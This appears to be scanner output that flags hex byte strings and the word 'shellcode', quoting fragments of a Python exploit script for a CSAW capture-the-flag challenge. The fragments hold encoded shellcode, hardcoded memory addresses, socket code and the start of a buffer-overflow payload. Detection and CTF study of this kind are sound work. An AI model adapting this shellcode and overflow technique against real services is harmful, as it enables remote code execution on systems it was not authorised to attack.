Detected 7 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’: \xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01" "\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16" "\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f" "\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0" "\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66") freespace = 0x0804b000 # rwx recv = 0x08048890 pr = 0x08048943 offset = 0x41c print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) print s.recv(4096) print s.recv(4096) s. Detected 3 occurrence(s) of ‘shellcode’: 6) s.send("-1") print s.recv(4096) time.sleep(1) payload = "A"*(0x41c+4) [...]
↧